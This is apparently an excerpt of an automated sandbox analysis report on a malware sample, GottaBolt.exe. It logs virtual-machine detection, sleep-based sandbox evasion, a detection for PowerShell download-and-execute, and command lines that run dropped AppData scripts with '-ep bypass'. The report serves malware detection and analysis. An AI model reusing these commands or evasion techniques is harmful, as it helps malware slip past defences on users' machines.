          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
          Source: C:\Users\user\Desktop\GottaBolt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
          Source: C:\Users\user\Desktop\GottaBolt.exeMemory allocated: 26504820000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeMemory allocated: 2651E3A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\GottaBolt.exeWindow / User API: threadDelayed 7692Jump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeWindow / User API: threadDelayed 2159Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4831Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5008Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3695
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6018
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3015
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1668
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2049
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 404
          Source: C:\Users\user\Desktop\GottaBolt.exe TID: 7604Thread sleep time: -30437127721620741s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep count: 4831 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep count: 5008 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep time: -7378697629483816s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep time: -14757395258967632s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep count: 3015 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep count: 1668 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6072Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep count: 2049 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep count: 404 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4864Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5580Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\GottaBolt.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: GottaBolt.exe, 00000000.00000002.1510540109.0000026506505000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Hypervisor Logical Processor
          Source: powershell.exe, 0000000A.00000002.1412510517.000001A93C448000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: GottaBolt.exe, 00000000.00000002.1509055422.00000265061D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V dpibbtingubdfii Bus
          Source: GottaBolt.exe, 00000000.00000002.1521564330.000002651FE76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor3\p
          Source: GottaBolt.exe, 00000000.00000002.1509055422.0000026506236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V dpibbtingubdfii Bus Pipesd
          Source: GottaBolt.exe, 00000000.00000002.1521564330.000002651FE76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
          Source: GottaBolt.exe, 00000000.00000002.1521564330.000002651FE76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid PartitionZ.wz1
          Source: mshta.exe, 00000010.00000003.1558281415.000001A58904A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
          Source: GottaBolt.exe, 00000000.00000002.1510540109.0000026506505000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V Virtual Machine Bus Pipes
          Source: powershell.exe, 0000000A.00000002.1412510517.000001A93C448000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: GottaBolt.exe, 00000000.00000002.1521564330.000002651FE76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
          Source: GottaBolt.exe, 00000000.00000002.1510540109.0000026506505000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *Hyper-V Dynamic Memory Integration Service
          Source: GottaBolt.exe, 00000000.00000002.1509055422.00000265062C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisorr(I
          Source: GottaBolt.exe, 00000000.00000002.1521564330.000002651FE76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus PipesleS
          Source: GottaBolt.exe, 00000000.00000002.1510540109.0000026506505000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
          Source: GottaBolt.exe, 00000000.00000002.1510540109.0000026506505000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V Hypervisor Root Partition
          Source: GottaBolt.exe, 00000000.00000002.1510540109.0000026506505000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )Hyper-V Hypervisor Root Virtual Processor
          Source: GottaBolt.exe, 00000000.00000002.1510540109.0000026506505000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
          Source: powershell.exe, 0000000A.00000002.1412510517.000001A93C448000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: GottaBolt.exe, 00000000.00000002.1509055422.00000265061FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration ServiceerCo.~
          Source: GottaBolt.exe, 00000000.00000002.1521564330.000002651FE76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
          Source: GottaBolt.exe, 00000000.00000002.1523367984.0000026521F67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell download and execute
          Source: Yara matchFile source: amsi64_7948.amsi.csv, type: OTHER
          Source: Yara matchFile source: Process Memory Space: GottaBolt.exe PID: 5260, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7948, type: MEMORYSTR
          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc3.ps1, type: DROPPED
          Bypasses PowerShell execution policy
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc1.ps1"
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc1.ps1"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 "Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 "
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 "
          Source: powershell.exe, 0000000E.00000002.2511997234.0000017609EBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2511997234.000001760949D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: powershell.exe, 0000000E.00000002.2511997234.00000176094BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2511997234.000001760A8BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2511997234.0000017609EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerP
          Source: powershell.exe, 0000000E.00000002.2505857617.000000250C4CA000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager Chrome
          Source: C:\Users\user\Desktop\GottaBolt.exeQueries volume information: C:\Users\user\Desktop\GottaBolt.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
